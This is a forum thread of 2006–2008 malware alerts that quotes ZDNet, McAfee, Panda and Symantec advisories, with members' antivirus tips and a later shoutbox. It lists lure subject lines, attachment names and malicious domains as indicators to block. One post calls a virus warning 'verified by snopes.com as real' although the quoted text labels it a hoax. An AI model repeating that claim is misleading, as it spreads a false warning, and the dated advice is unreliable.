Meanwhile, another individual bad guy (or a group of others) looks for unreported vulnerabilities. Not every vulnerability that's found can be exploited, and not every exploit lends itself to the type of crime that's profitable. Yet another person crafts a Trojan horse. And so on. The current crop of PowerPoint Trojans have been broadcasting captured keystrokes and other data to addresses within the 8800.org domain, a Chinese Web hosting site, but that could easily be a dead end.

So is the solution not to open any e-mail attachments? Have the villains finally won? No. Remember, the criminal hackers have been sending these to targeted companies, so, unlike the situation with the Melissa virus, interoffice Word documents, in general, ought to be safe. Antivirus vendors, with their vast networks of reporting desktops worldwide, are the ones discovering these corporate-espionage Trojans. As long as your antivirus protection is up-to-date, you should get protection within a few hours or days of a new zero-day threat. As for the companies under attack, they need to be wary of attachments and wait for Microsoft to patch these latest PowerPoint flaws.

http://news.zdnet.com/2100-1009_22-6098229.html?tag=nl.e589

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Alert lang sa Firefox users.

It seems the scum who produce scumware are turning their attention
towards Firefox. Since it's gaining popularity, and many are migrating
here from Internet Explorer, FF is gaining visibility.

Here check it out,

Quote
Trojan piggybacks on Firefox

A new Trojan horse making the rounds has been installing itself as a Firefox extension, according to security company McAfee.

The FormSpy Trojan attacks computers that have already been infected with the Downloader-AXM Trojan, according to a security advisory McAfee issued Tuesday. Once FormSpy is executed, it installs itself as a component of the Firefox Web browser.

The FormSpy spyware then gleans sensitive information, such as credit card and bank account numbers, from the user's browser and forwards it to a malicious Web site. But this Trojan is capable of other tricks, as well, McAfee noted.

The main executable is also capable of sniffing passwords from traffic for ICQ (the "I seek you" program that alerts users to the presence of acquaintances online), FTP (file transfer protocol), IMAP (Internet message access protocol, an e-mail management program) and POP3 (post office protocol, a data format for e-mail), McAfee warned.

Although the FormSpy Trojan is circulating, it is considered a low risk, McAfee said. What's more, people may have already taken steps to mitigate the earlier Downloader-AXM Trojan that is needed for the FormSpy Trojan to take hold.

http://news.zdnet.com/2100-1009_22-6098615.html?tag=nl.e589

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Users of MySpace,

There's a worm that's running rampant within the MySpace environment! Make sure your antivirus/antispyware/firewall programs are up-to-date.

Here's an article I received in my Inbox.

Quote
MySpace QuickTime Worm

It seems that on December 1st, a cross-scripting worm was
discovered to be infecting MySpace accounts. The
JS/Qspace, as it has been called, is a worm that uses
vulnerability in Apple’s QuickTime Media Player HREF feature
in order to redirect visitors to a phishing site. Once on the
site, the users are asked to put in their information where it is
then gathered.

The vulnerability is a two part attack. First, it uses the before
mentioned vulnerability in QuickTime in order to take
advantage of the vulnerability in MySpace, which can allow
the automatic modification of an account, even from a Web
site. This modified account then becomes a trap for other
unsuspecting users, by creating an appealing page, complete
with a .mov file to view.

The QuickTime vulnerability uses the HREF feature in
QuickTime, which allows links to be put into movie files that
can link out to fttp/http/https sites and even run JavaScript.
An infected MySpace user account has been modified with
an embedded QuickTime movie and a modification of all the
links on the page to redirect visitors to the phishing page. If a
user wishes to view the movie, they are redirected to a
bogus login page where they are prompted to enter their
username and password at which time, the information
is collected. This information is then used to log in and modify
that account and so on and so forth.

The MySpace part of this attack comes in the form of being
able to modify MySpace accounts from an outside location
and being able to modify accounts in bulk, without any sort of
system security intervention. This allows the second half of
the infection, which is the assimilation of the infected user's
account, to ensnare other members. Some of the
modifications include the embedded QuickTime movie and
the modification of all the links on the page. The page itself
gets a new look with a blue navigation bar, among other
things, that are not usually present on a MySpace user
account page.

The infected user will also attempt to gather up some
business by spamming all the users in the infected user's
contact list. The spam appears to have an attached movie,
but it actually redirects you to a porn site where a company
called Zango, Inc. takes over. Zango, Inc. is formerly known
as 180 Solutions, which is a company that coincidentally
settled for three million dollar deal with the Federal Trade
Commission a month ago in an AdAware case, in which they
were accused of adding software without proper user
consent.

There are over 73 million registered users on MySpace and in
an unofficial security scan of 150 MySpace users, it was
revealed that one third of all the users were infected. That
could potentially be some huge numbers. MySpace has
reported, however, that they have already shut down all of
the infected accounts, so everyone should be safe now.

This isn’t the first time there has been an attach on the
MySpace Web service and in fact, there were a couple of
variations of this worm floating around the site as well. On
top of taking advantage of the unlatched vulnerabilities, the
reason this particular virus was so successful is because
of the fact that people think movies are always safe. Well,
they obviously aren't, so keep that in mind. Also, the fact that
with MySpace, the account seems to timeout quite often,
prompting the users to log in from time to time, makes things
questionable. This makes the QuickTime movie file login
seem like it belongs, so unsuspicious users would log right in,
coughing up their information to the attackers.

In short, watch what you’re clicking on in MySpace. This
holds especially true with any QuickTime .mov files and any
suspicious messages from your contacts, complete with
links. If MySpace asks for your account login information, be
suspicious and recheck the actual address.

Until next week, stay safe out there

*********************************

Steve, Publisher
Computer Tips and Techniques


:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Virus Update: Panda warns of a dangerous Virus doing the rounds online

Quote
- Panda Software's weekly report on viruses and intruders -
    Virus Alerts, by Panda Software (http://www.pandasoftware.com)

Madrid, December 8, 2006 - This week's report looks at the FormShared.A
worm and the Banker.FOH and Banbra.DMW Trojans.

FormShared.A is a worm aimed at spreading the SpyForms.S Trojan across
P2P file-sharing programs.

To do this, FormShared.A uses its own P2P client. It creates a
subfolder called SHARED in the Windows directory. This contains a series of
files with false names in order to entice other users to download
SpyForms.S voluntarily. These names include: 4SCREENS V3.19 BY MP2K.CZIP, 4T AV
V1.8 CD-VERSION FOR PALMOS.CZIP, 4T PUBLICATION 1.2 FOR PALMOS.CZIP, or
4TEAM FOR MICROSOFT OUTLOOK 2002 V1.50.0202 RETAIL.CZIP.

Banker.FOH is a Trojan designed to steal confidential information, such
as user names and passwords, from compromised computers. It does this
by capturing keystrokes entered by the user, storing them and then
sending them out by email.

If Banker.FOH runs on a computer without an Internet connection, an
error screen is displayed with the text: Socket Error # 11004.

As with most Trojans, Banker.FOH is not able to spread by itself, and
therefore needs the intervention of a malicious user. The means of
distribution used vary and include floppy disks, CD-ROMs, email messages
with attachments, Internet download, files transferred via FTP, IRC
channels, P2P file sharing networks, etc.
 
Finally, Banbra.DMW is a Trojan designed to steal confidential data
from users of a well-known Brazilian bank. Interestingly, this is a
'one-use' malicious code which can only be run once on each computer it
infects.

Every time it infects a computer, Banbra.DMW sends an email to the
creator of the Trojan indicating the username and the time the computer was
infected. Once has done this, it hijacks Internet Explorer and waits
for the user to access the bank's web page. Then, Banbra.DMW takes the
user to a false web page -created by the Trojan itself- which is an
imitation of the original page.

Finally, it compiles the stolen data and sends it out by email,
allowing the attacker to commit identity theft and online fraud.

All users that want to know whether their computers have been attacked
by these or other malicious code can use ActiveScan, the free solution
available at: www.pandasoftware.com/activescan. Users can carry out a
complete inspection, free of charge, of all the areas of their computers
that they suspect may be infected.

For further information about these and other computer threats, visit
Panda Software's Encyclopedia.

------------------------------------------------------------
To unsubscribe from Virus Alerts, please visit:
http://www.pandasoftware.com/unsubscribe.asp

To contact with Panda Software, please visit:
http://www.pandasoftware.com/about/contact/
--------------------------


Just make sure you antivirus systems are in place and updated!

:cool:


part_timer_lang

  • Moderator
  • *
    • Posts: 1,231
    • Likes Received: +1/-0
It seems the target again here is Internet Explorer so be sure to use a different browser. And always keep your computers secure from viruses and spywares.  


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Especially this Christmas time. These cybercrooks are especially aware that people are looking to buy online. So ingat lang and make sure your protection software is intact!

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Guys, careful about this worm. It behaves nicely but don't be deceived. Here, read this,

Quote
This worm wishes you a Happy New Year

An e-mail worm disguised as a New Year's greeting is making the rounds on the Internet.

Worm-laden messages are titled "Happy New Year" and contain an attachment called either postcard.exe or postcard.zip, according to experts at VeriSign's iDefense Labs, which provides information on security flaws and exploits. If the attachment is opened, malicious software is downloaded from the Internet and can infect computers running Windows operating systems.

Once a computer is infected, it looks for open mail proxies and begins spamming mail to infect other computers. The worm is already moving quickly across the Internet, at a rate of five e-mails per second on at least one large network, according to the iDefense Labs Web site.

Security experts say that although the virus looks similar to the Warezov Trojan horse that has plagued the Internet for the past month, it is actually a new variant of the worm and has been largely undetected as of December 28. iDefense performed a triage analysis of the threat and found that more than a dozen codes were installed on a computer from several worm and Trojan horse families. More than 160 e-mail servers are used by the worm to send out spam to potential victims, the company said.

High volumes of mass e-mails are usually sent around the holidays. This year has been no different, experts say. The spike in holiday spam is largely attributed to the fact that people have been more likely to open the messages.

Read more here ....
http://news.zdnet.com/2100-1009_22-6146321.html?tag=nl.e550

:cool:


sam_1_els

  • sam_1_else
  • Forum Master 400
  • ***
    • Posts: 459
    • Likes Received: +0/-0
Bin-Laden and Olympic Torch Virus

This virus has been circulating the net since mid 2006. Just got this warning email from a friend today, it's better to be aware. This virus has been verified by snopes.com as real.

Quote
Bin-Laden and Olympic Torch Virus Warning Hoax
Summary:
Message claims that two very destructive viruses are being distributed, one in an email concerning the capture or hanging of Osama Bin-Laden and another in an email with the subject "Invitation" (Full commentary below.)
 
Emails with pictures of Osama Bin-Laden hanged are being sent and the moment that you open these emails your computer will crash and you will not be able to fix it!

This e-mail is being distributed through countries around the globe, but mainly in the US and Israel.

Don't be inconsiderate; send this warning to whomever you know.

If you get an email along the lines of "Osama Bin Laden Captured" or "Osama Hanged" don't open the attachment.

Please read the attached warning issued today.

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS:

You should be alert during the next days:

Do not open any message with an attached filed called "Invitation" regardless of who sent it .

It is a virus that opens an Olympic Torch which "burns" the whole hard disc C of your computer. This virus will be received from someone who has your e-mail address in his/her contact list, that is why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it.

If you receive a mail called "invitation", though sent by a friend, do not open it and shut down your computer immediately.

This is the worst virus announced by CNN, it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept.


more info here.... http://www.snopes.com/computer/virus/osama.asp


Wynn

  • Forum Master 400
  • ***
    • Posts: 485
    • Likes Received: +0/-0
New Virus in town,  Trojan.Peacomm.  
people ingat lang po, muntik na mabiktima ang isa kong computer kasi naka receive ako nang email na very catchy ang subject buti na lang i decided to google myself the news.  I receive the news in chinese so hanap ako nang english so this one i found in semantic.com


Discovered: January 19, 2007
Updated: January 22, 2007 04:04:42 PM GMT
Also Known As: CME-711 [Common Malware Enumeration], TROJ_SMALL.EDW [Trend Micro], Small.DAM [F-Secure], Downloader-BAI [McAfee], Troj/Dorf-Fam [Sophos]
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP


Trojan.Peacomm is a Trojan horse that drops a driver program file to download additional security threats.

Trojan.Peacomm reportedly arrives as an attachment to a spammed email with the following characteristics:

Subject:
One of the following:

    * A killer at 11, he's free at 21 and kill again!
    * U.S. Secretary of State Condoleezza Rice has kicked German Chancellor Angela Merkel
    * British Muslims Genocide
    * Naked teens attack home director.
    * 230 dead as storm batters Europe.
    * Re: Your text
    * Radical Muslim drinking enemies's blood.
    * Chinese missile shot down Russian satellite
    * Chinese missile shot down Russian aircraft
    * Chinese missile shot down USA aircraft
    * Chinese missile shot down USA satellite
    * Russian missile shot down USA aircraft
    * Russian missile shot down USA satellite
    * Russian missile shot down Chinese aircraft
    * Russian missile shot down Chinese satellite
    * Saddam Hussein safe and sound!
    * Saddam Hussein alive!
    * Venezuelan leader: "Let's the War beginning".
    * Fidel Castro dead.


Attachment:
One of the following:

    * FullVideo.exe
    * Full Story.exe
    * Video.exe
    * Read More.exe
    * FullClip.exe
    * GreetingPostcard.exe
    * MoreHere.exe
    * FlashPostcard.exe
    * GreetingCard.exe
    * ClickHere.exe
    * ReadMore.exe
    * FlashPostcard.exe
    * FullNews.exe


Note: Due to a substantial increase in activity, Symantec Security Response raised this threat to category 3 on January 22, 2007.

Further reading: Trojan.Peacomm: Building a Peer-to-Peer Botnet


Protection

    * Virus Definitions (LiveUpdate? Daily) January 19, 2007
    * Virus Definitions (LiveUpdate? Weekly) January 22, 2007
    * Virus Definitions (Intelligent Updater) January 19, 2007
    * Virus Definitions (LiveUpdate? Plus) January 19, 2007

Threat Assessment
Wild

    * Wild Level: High
    * Number of Infections: More than 1000
    * Number of Sites: More than 10
    * Geographical Distribution: Medium
    * Threat Containment: Easy
    * Removal: Moderate

Damage

    * Damage Level: High
    * Payload: Downloads additional security threats.
    * Degrades Performance: Sent UDP packets may degrade performance.

Distribution

    * Distribution Level: Low
    * Ports: UDP port 4000, UDP port 7871

Writeup By: Masaki Suenaga


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Yes, I've received a number of those especially these December. However, they have been tapering off ngayon-ngayon lang. Anyway, I suspected that they've been "scumware" so i just trashed them.

But it's good to receive confirmation and the technical details. You've done the PMT a great service. So,

Thanks Wynn!

You're a ... wynner!

:cool:

I-append ko lang since I just got this from a newsletter, at related siya,

Quote
'Storm Worm' rages across the globe

"Storm Worm," one of the larger Trojan horse attacks in recent years, is baiting people with timely information about a deadly, real-life storm front, security researchers said Friday.

Over an eight-hour period Thursday, malicious e-mails were sent across the globe to hundreds of thousands of people, said Mikko Hypponen, chief research officer for F-Secure.

People who open the attachment then unknowingly become part of a botnet. A botnet serves as an army of commandeered computers, which are later used by attackers without their owners' knowledge.

Storm Worm carries the subject line "230 dead as storm batters Europe," Hypponen said, noting the unusual twist to the e-mail.

"The e-mail was started 15 hours ago, when the storm was peaking in Central Europe," Hypponen said. "This is unusual in that it was very timely."

Storm Worm is a Trojan horse with an executable file as an attachment. Cybercriminals took advantage of social engineering, using the news of the European storm to get people to open the attached malicious file, which promises more news on the weather emergency. The recipient must open the file for it to execute.

The file creates a back door to a computer that can be exploited later to steal data or to use the computer to post spam.

Storm Worm is already close to being as large as the bigger attacks of 2006, Hypponen said, though it's still smaller than Sasser and Slammer.

Hypponen also noted that this Trojan horse is unusual because most attacks these days tend to be smaller and targeted, as criminals seek to pilfer personal information for financial gain, rather than fame.

Though Storm Worm is widespread, the damage may ultimately be minimal in the U.S. because most tech security companies will have already added it to their blocking list before people get into work, he added.

Other e-mail subject lines for it include "U.S. Secretary of State Condoleezza..." and "A killer at 11, he's free at 21 and..."

According to the Associated Press, the European storm has killed at least 41 people.

http://news.zdnet.com/2100-1009_22-6151414.html?tag=nl.e550
« Last Edit: Jan 24, 2007, 11:29 AM by rma2003 »


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Here are things you may want to be aware of, so that you could put additional safeguards to your computing experiences.

Quote
Windows animated cursor flaw--150 sites infected

 By  Robert Vamosi,  ZDNet Reviews
Published on ZDNet News: April 2, 2007, 6:30 AM PT

There's a new Microsoft Windows vulnerability being exploited across the Internet on over 150 Web sites. The vulnerability is caused by an unspecified error in the way Windows 2000, XP, and Vista handles animated cursors.

Animated cursors allow a mouse pointer to appear animated on a Web site. The feature is often designated by the .ani suffix, but attacks for this vulnerability are not constrained by this file type so simply blocking .ani files won't necessarily protect a PC. Successful exploitation can result in memory corruption when processing cursors, animated cursors, and icons. According to Arbor Networks, the malicious code on compromised Web sites exploiting this flaw appears to be originating from the following sites, which you may want to block:

wsfgfdgrtyhgfd.net

85.255.113.4

uniq-soft.com

fdghewrtewrtyrew.biz

newasp.com.cn

To become infected, users must be using Internet Explorer 6 or 7; there is no need to click, just visiting an infected site is enough for an infection. The flaw does not affect Firefox or Opera Internet Browsers. Microsoft will release a patch on April 3, 2007. Until a patch is released, users should browse the Internet using a non-Internet Explorer browser.

Additional Resources

Microsoft: Advisory 935423

NIST: CVE-2007-0038

Arbor Networks: Any Ani file could infect you

Internet Threat Rating 8: How we rate


Quick Facts

Name: Windows animated cursor attack

Date first reported: 03/29/07

CVE Number: CVE 2007-0038

Vulnerable software: Microsoft Windows 2000, SP1 through Windows Vista.

What it does: Causes a denial of service attack (persistent reboot) or could allow remote access.

Recommendations: Use an Internet browser other than Microsoft Internet Explorer, such as Firefox or Opera.

Exploit code available: Yes

Vendor patch available: Expected April 3, 2007.

http://news.zdnet.com/2100-1009_22-6172440.html?tag=nl.e550



:cool:



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Amazing!

Everytime someone comes up with a solid malware defense, someone is still able to sharpen the sword still more. In this never-ending contest, I'm rooting for the good guys.

Those who use their brilliance just to make our online experience miserable are simply cyber-terrorist, as far as I'm concerned.

But I'm glad that this "blue pill" thing has been exposed. At least, antivirus/spyware programmers may find a way to combat this.

:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0
^ minsan my playful mind thinks that sila-sila rin may gawa ng ibang virus to keep the economy running...  :watchuthink:
 

Posted on: Apr 24, 2008, 07:42 PM
Quote
Users of MySpace,

There's a worm that's running rampant within the MySpace environment! Make sure your antivirus/antispyware/firewall programs are up-to-date.


The thing is there are more and more channels now (more than ever) for viruses to proliferate with the ever growing social networks on the web.  Most people allow all the cutie-wootsies without a thought of the system vulnerabilities being opened up... java enabled, flash applications, etc. which can have trojan programs that users don't know might be injected into their system.  We've definitely gone a long way since the "CBrain" virus from boot sectors of floppy disk drives...  :D

Yung mga drive autoruns  (gaya nung thumb drives) are also prone to viruses like exp1orer.exe ... so check your (hidden) autorun.inf files from time to time.

« Last Edit: Apr 24, 2008, 07:53 PM by pinoynetworker »


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
It has become so that in doing business online, you need to consider having pcsecurity tools and programs, in addition to webmaster tools, marketing resources, and promotional materials.

:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0
^ what sucks is before you only spend time scanning for viruses... now you also scan for spywares & adwares...  :mad:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
True. Viruses only tend to destroy your files and data. But with back-up systems, it can be restored. It can be annoying, but at least, it can be fixed. At its worst, reformat and rebuilding your disk can be done.

But with spyware and adware, your privacy is invaded. I know. Someone used my credit card details in order to buy stuff. It's good my bank alerted me to this. We had time to shut down my card before greater damage could be done. But I still paid for some of the charges.

Also, spam is also a result of your privacy being invaded.

That's why I bought an integrated PC security software. The results have been good so far.

:cool:


jigolo

  • Junior Member
  • **
    • Posts: 28
    • Likes Received: +0/-0
That's the buffer overrun, so must need to updates always your windows software..


camjarman

  • Senior Member
  • **
    • Posts: 99
    • Likes Received: +0/-0
Recently got infected with TDSS trojans.  I don't know what they do exactly, pero I think galing sila sa isang site na na-surf ng pamangkin ko ... updated Symantec caught it, at safe na system ko.   :applause:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Some sites today use malicious scripting. All you need to do is find the
site online. It will download stuff into your computer without your
permission.

You really need some quality protection software for these kind of
things.

Cheers,
:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0

iba na talaga ngayon... dati all you have to do is make sure those floppy disks that you put into your drives have been sanitized prior to use.  Nowadays there are so many channels by which the PC can be infected.  For all we know those cutesy-wootsie widgets you put on your Friendster profiles, blogs, etc could be a security breach...  so as has been constantly advised... always keep your protection upto-date...
 


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Be careful especially this Christmas. There is a group (?) of people selling
what they call the "Christmas Exploitation Kit." They sell this to those with
hacker-like mentality so that this could be given to their friends.

Once their friends open this, their systems become vulnerable. This kit
has malicious codes that are supposed to work on ALL browsers! At the
moment, they have a low detection rate. Seems that some anti-malware
companies have yet to know how to combat this kit.

So ingat lang sa Paskong ito.

:cool:


explorer

  • Forum Tambay 200
  • ***
    • Posts: 263
    • Likes Received: +0/-0
Hi guys, Share ko lang ang gamit ko na free antispyware and at antivirus.

1.  Spyware blaster - freeware
2.  Ad-Aware - freeware version.
3.  Eset NOD32 - Licensed

So far wala akong naging problema sa mga ito at nde din gaano na i-infect ang system ko basta laging updated lang ang definition. gamit ko po ito sa computer shop ko.





pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0

Avira naman ang anti-virus ko.... so far ok naman ang detection.... better than my AVG before...



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
I use a combination of free and paid ones. Ad-aware and Spywareblaster are the
free ones I use. My paid protection software is Panda.

So far, ok naman.

:cool:


networm

  • Forum Tambay 200
  • ***
    • Posts: 229
    • Likes Received: +0/-0
in my experience, NOD32 has a good detection and removal, it has also the least to consume resources while keeping the system safe. Of course, for spyware/adware removal there is Spybot. There is also a free version of Comodo Internet Security and it comes with a firewall.

But, even if how good we secure our system. We, endusers still have to be careful, specially when browsing websites with malicious scripts. Also, the viruses that comes with Flashdrive, this autorun.inf. As for me, I disabled the autorun function for Flashdrives and CD/DVD. I prefer going to Windows Explorer, and explore manually.

But with the danger of viruses from Flashdrive, another software protection emerge.
http://www.brothersoft.com/usb-virus-scan-132249.html
http://www.usbantivirus.net/


explorer

  • Forum Tambay 200
  • ***
    • Posts: 263
    • Likes Received: +0/-0
Hi networm thanks for sharing the link, ma try ko nga muna ang trial version.


 


PMT Shoutbox

Refresh History
  • Post only questions or comments here. Advertisements NOT ALLOWED.
  • Doni_megaworld: good morning! who's online?
    Today at 08:47 AM
  • Doni_megaworld: good morning guys!
    Yesterday at 09:47 AM
  • Doni_megaworld: work work
    May 26, 2020, 02:47 PM
  • Niel Jhacoubs: What's good in this afternoon?
    May 26, 2020, 02:01 PM
  • Doni_megaworld: agreed
    May 25, 2020, 03:30 PM
  • Niel Jhacoubs: @lyndrey depende siguro sa seller, so kung mag order kayo online much better na kilala niyo at trusted
    May 25, 2020, 02:29 PM
  • Doni_megaworld: kumusta? sino mga online?
    May 24, 2020, 03:24 PM
  • lyndrey: Do not buy PPE online. Either expensive overpriced or totally damaged or cannot be used
    May 24, 2020, 01:37 PM
  • lyndrey: Online Scammers/online shopping cheats are active with stay at home regimen.
    May 24, 2020, 01:34 PM
  • Niel Jhacoubs: @razee22 Parang di na po nacoconvert into money ang load po.
    May 12, 2020, 04:07 PM
  • razee22: any advised or recommendation?
    May 12, 2020, 11:16 AM
  • razee22: Paano po ba iconvert ang load into money like Paypal, Paymaya or Gcash?
    May 12, 2020, 11:15 AM
  • razee22: paano po ba iconvert ang load into money? Paypal or Gcash
    May 12, 2020, 11:14 AM
  • Niel Jhacoubs: Hellooooo, okay lang ba kayo dyannnn?
    May 11, 2020, 11:40 AM
  • theimprobableone: hi
    May 05, 2020, 11:37 AM
  • freelance_treasure_hunter: hello all...
    Apr 28, 2020, 04:26 PM
  • Niel Jhacoubs: Can someone save me?
    Mar 24, 2020, 01:39 PM
  • Niel Jhacoubs: I'm tired.
    Mar 24, 2020, 01:39 PM
  • Victorvargas: Hello sa lahat po new lang po dito. Hope na marami matutunan ako about business.
    Mar 21, 2020, 09:43 PM
  • Niel Jhacoubs: Yoh, its been a while.
    Mar 17, 2020, 10:33 AM
  • demi07: Hello everyone! New in pinoymoneytalk :)
    Mar 14, 2020, 01:24 PM
  • theappswitch: Hi!
    Feb 25, 2020, 03:14 PM
  • mike2020: hi po sa inyo lahat
    Feb 23, 2020, 11:52 PM
  • Jayjayqwe: hi po
    Feb 19, 2020, 11:27 PM
  • tirs d pip: hello
    Feb 18, 2020, 02:32 PM
  • Ace1105: Hello sa lahat...  :hello:
    Feb 07, 2020, 09:46 AM
  • FREYAHYARA: Anyone knows where Ig shops like styledom.ph, thriftme, instashoppeavenu and the likes get their items for selling. Would like to venture in the same business but would like to know where and who the suppliers are
    Jan 28, 2020, 09:38 PM
  • Niel Jhacoubs: To bpc85 kung nakalagay ang inyong names sa beneficiary list ng iyong ama kay may makukuha po kayo.
    Nov 28, 2019, 02:18 PM
  • Niel Jhacoubs: Hellooooo, its been a while. :)
    Nov 28, 2019, 02:16 PM
  • miakashidou31: hi , meron po ba ditong nagta transfer sa paypal?
    Nov 05, 2019, 01:46 PM
  • whennedy: good noon po
    Oct 18, 2019, 12:04 PM
  • edzlpdac: goood day po sa lahat!
    Oct 12, 2019, 03:37 PM
  • bpc85: ask lng sana ako kung may makukuha ba kami ng Mama ko at ako or mga kapatid ko sa benepisyo ng aming Ama bilang membro ng AFPSLAI. thank you po.
    Sep 27, 2019, 12:52 PM
  • bpc85: Hi guys, im new here,.
    Sep 27, 2019, 12:52 PM
  • Anaperdi: Hi just want to know if meron dito who is into boundary hulog ng motorcycle? For mga riders ng courier. Pwede ba magpashare how it works? Naisip ko lang baka pwede ko ibusiness, meron na pala mga posts online pero di pa clear ang system sa akin. thank  you sa makakapansin
    Sep 21, 2019, 11:32 AM
  • Anaperdi: Hi newbie here..
    Sep 21, 2019, 11:19 AM
  • jprios: May contact ba kayo kung sakali?
    Sep 18, 2019, 06:11 PM
  • jprios: Sino pwedeng mahiraman dito?
    Sep 18, 2019, 06:09 PM
  • kfg52: Present!
    Sep 15, 2019, 07:26 PM
  • juju31: san po ba may nag papahiram dito
    Sep 14, 2019, 07:18 PM
  • juju31: hello
    Sep 14, 2019, 07:18 PM
  • FutureGizmo: Thanks julz! Medyo ganun nga trabaho namin ngayon, to monitor spam posts kasi ang daming spam bots. But thanks for reporting. Auto-ban agad ang spammers sa amin haha
    Sep 07, 2019, 12:17 PM
  • julz: @FutureGizmo si @nikkikv18 just posted more than 10 posts about porn sites. hay, spam.
    Sep 03, 2019, 01:05 PM
  • Cid_brent: sino po dyan pwede magbigay send ng paypal funds and I will pay you using gcash?
    Aug 25, 2019, 08:58 PM
  • Meghan91811: Sino po may alam about Rice Farming...
    Aug 25, 2019, 07:44 AM
  • roselove: hello po sa inyo... newbie here
    Aug 06, 2019, 03:31 PM
  • Niel Jhacoubs: Sino palaging active dito?
    Jul 30, 2019, 04:15 PM
  • dagocjasonrey: Anong update dito?
    Jul 22, 2019, 08:49 PM
  • mark_Lee: anong bago dito
    Jun 28, 2019, 01:03 AM